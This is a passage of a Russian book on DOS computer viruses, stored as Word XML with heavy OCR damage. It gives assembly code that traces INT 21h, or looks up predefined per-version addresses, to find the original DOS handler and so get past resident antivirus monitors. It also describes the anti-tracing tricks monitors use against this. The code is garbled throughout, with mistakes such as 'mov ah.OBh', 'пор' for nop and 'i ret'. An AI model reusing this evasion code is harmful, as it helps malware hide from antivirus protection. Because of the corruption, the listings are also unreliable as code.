        <w:t>[Сохраним в стеке сегмент, а затем и смещение текущего обработчика</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>push es</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">push bx </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Установим в регистре АН номер какой-либо безобидной функции</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;(чтобы определение адреса обработчика DOS</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;не сопровождалось разрушениями)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">mov ah.OBh </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>.Запускаем трассировку</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>cli</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">iret </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Обработчик INT 01 h</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">lnt01: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;При вызове обработчика в стеке находятся: значение регистра IP,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;значение регистра CS, флаги перед прерыванием.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">[Адресуемся к стеку с помощью регистра ВР, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="002C1831">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1039" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Предварительно сохранив текущее значение ВР</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>push bp</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">mov bp.sp </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">;Теперь в стеке находятся: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;SS:[BP] - ВР</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;SS:[BP+2] - IP</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;SS:[BP+4] - CS</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;SS:[BP+6] - флаги</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>; Проверяем флаг продолжения</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">cmp byte ptr cs:ContinueFlag,1 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Если флаг продолжения выключен, то выходим из трассировки</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">jne TraceOff </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Проверяем текущий адрес. Если сегмент меньше 300h,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>обработчик DOS достигнут, иначе - продолжаем трассировку</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">;и выходим из обработчика </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">cmp word ptr [bp+4],300h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">jnc ExitFromInt </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Достигнут DOS - берем из стека адрес обработчика и сохраняем его</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">push bx </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>mov bx,[bp+2]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov word ptr cs:021,bx</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov bx,[bp+4]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov word ptr cs:S21,bx</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">pop bx </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>.Заканчиваем обработку прерывания и дальнейшую трассировку</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">TraceOff: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Устанавливаем в ноль бит, соответствующий TF,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;в копии регистра флагов в стеке</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">and word ptr [bp+6],OFEFFh </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[Устанавливаем в ноль флаг продолжения </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>mov byte ptr cs:ContinueFlag,0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">ExitFromInt: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">pop bp </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>.Выходим из обработчика</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">i ret </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="002C1831">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1040" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Восстановление после трассировки</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Next: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Сбрасываем флаг продолжения</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">mov byte ptr ds:ContinueFlag,0 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Восстанавливаем прежнее значение вектора прерывания INT 01 h</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov ax,2501 h</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov dx.si</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov ds.di</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">int 21 h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>В настоящее время этот алгоритм можно считать несколько устарев-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>шим. Дело в том, что современные версии DOS могут размещать свой</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>обработчик в областях верхней памяти. Поэтому условие окончания</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">трассировки должно выглядеть, например, так: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>cmp word ptr [bp+4],300h</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">jb loc_65 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>cmp word ptr [bp+4],OFOOOh</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">ja loc_65 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>В качестве альтернативного варианта можно использовать такой прием.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Сначала определяется исходный сегмент DOS при помощи недокумен-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>тированной функции 52h прерывания INT 21h (возвращает адрес век-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">торной таблицы связи DOS): </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov ah, 52h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">int 21h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov SegDOS, es </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Тогда условие завершения трассировки можно оформить следующим</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">образом: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">push ax </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov ax, cs: SegDOS </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">cmp word ptr [bp+6], ax </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">pop ax </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">jz DOSIsGot </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Разумеется, разные приемы могут дать разные результаты. Причем все</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>результаты можно считать в той или иной мере корректными. Дело</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>в том, что современные версии DOS, даже будучи загруженными в верх-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">нюю память, всегда имеют точку входа в нижней памяти вида: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="002C1831">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1041" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>пор</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">пор </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Проверка состояния адресной линии А20</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">call Check_A20 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Переход в верхнюю память</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">jmp cs: dword ptr HI_DOS </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>С точки зрения обхода резидентных мониторов "правильным" следует</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>признать адрес в обработчике DOS, имеющий максимальное значение.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Мы еще вернемся к вопросу о нахождении "правильного" адреса далее. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Авторы антивирусных мониторов знают о подобном приеме поиска ори-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>гинального адреса DOS. Достаточно легко испортит трассировку, на-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">пример, вот такой вот фрагмент, встроенный в цепочку обработчиков: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>.Вызываем обработчик прерывания INT 60h (до этого момента</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>[Прерывание INT 60h должно быть перехвачено)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">int 60h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Сюда нужно вернуться из прерывания</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">пор </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Сюда реально вернемся, и флаг трассировки будет сброшен,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;то есть трассировка будет прекращена</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">пор </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Обработчик прерывания. При вызове прерывания флаг трассировки</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>.сбрасывается - при входе в обработчик трассировка будет выключена</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">lnt60: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Разрешение прерываний, так как при выходе из обработчика не</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">[будет восстанавливаться оригинальное значение регистра флагов </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sti </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Увеличиваем на единицу адрес возврата в стеке</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>push bp</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov bp, sp</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>add [bp+2],1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">pop bp </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Выходим из прерывания, но не командой IRET, а командой RETF 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">.чтобы не восстанавливать флаги (и, как следствие, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="002C1831">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1042" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>.флаг трассировки TF)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">retf 2 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Кроме того, факт трассировки можно достаточно просто обнаружить,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>применив хорошо известный разработчикам защит от несанкционирован-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ного копирования прием аппаратного конвейера, который использует</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>процессор для ускорения работы. При выполнении очередной команды</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>процессор считывает код следующей. Когда придет время выполнения</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>следующей команды, она будет уже считана из памяти, и не нужно бу-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>дет тратить время на ее чтение. Прием заключается в модификации ко-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>манд, которые уже оказались в конвейере: если трассировка не ведется,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>то код команд модифицируется только в памяти, а выполняется та про-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>грамма, которая находится в конвейере. Если трассировка ведется, то</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>конвейер сбрасывается перед каждой командой трассируемой програм-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>мы (конвейер сбрасывают такие команды, как JMP, CALL, RET) и вы-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">полняется модифицированный код. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Кодифицируем следующую команду. Команда JMP (безусловный</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>; переход) заменяется на две команды NOP (нет операции)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">mov Metka, 9090h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Переходим, если выполняется немодифицированный код (в случае,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;когда трассировка не ведется), и проходим дальше, если выполняется</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>кодифицированный код (в случае трассировки)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Metka: jmp NoTrace</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Trace: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Сюда попадем при выявленном факте трассировки</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">NoTrace: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Трассировка не ведется - нормальное выполнение программы </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Наконец, последний гвоздь в гроб идеи использования трассировки за-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>бит: "Выставленный флаг трассировки можно выявить косвенно, замас-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>кировав аппаратные прерывания, поместив в [SP-1] контрольное значе-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ние и дав инструкцию STI. Тогда по изменению слова в стеке можно</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">судить, было трассировочное прерывание или нет". </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Выявив факт трассировки прерывания DOS, мониторы начинают выда-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>вать об этом соответствующие сообщения, поэтому даже не самый</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>опытный пользователь догадается, что кто-то (например, вирус) пытает-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">ся попасть в систему. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="002C1831">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1043" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Метод предопределенньш адресов</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Переходим к методу определения оригинального адреса точки входа</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>в DOS, основанному на том, что эти адреса для разных версий и конфи-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>гураций DOS имеют в общем случае различные значения, но число</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>их ограничено. А это значит, что их можно просто-напросто выбирать</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>из таблицы (причем не очень большой). Прием не новый, но незаслу-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">женно забытый. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Имея программу, основанную на одном из ранее описанных способов</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>определения реального адреса обработчика DOS, загрузочные дискеты</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>с разными версиями DOS и немного терпения, можно получить при-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">мерно вот такую информацию. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Оригинальный обработчик DOS версии 3.30 всегда имеет вид: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>.Точка О</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">2Е CS: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>891ЕВ800 MOV [ООВ8],ВХ</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">2Е CS: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>8С06ВАОО MOV [OOBA],ES</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">СВ RETF </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>.Точка 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">2Е CS: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
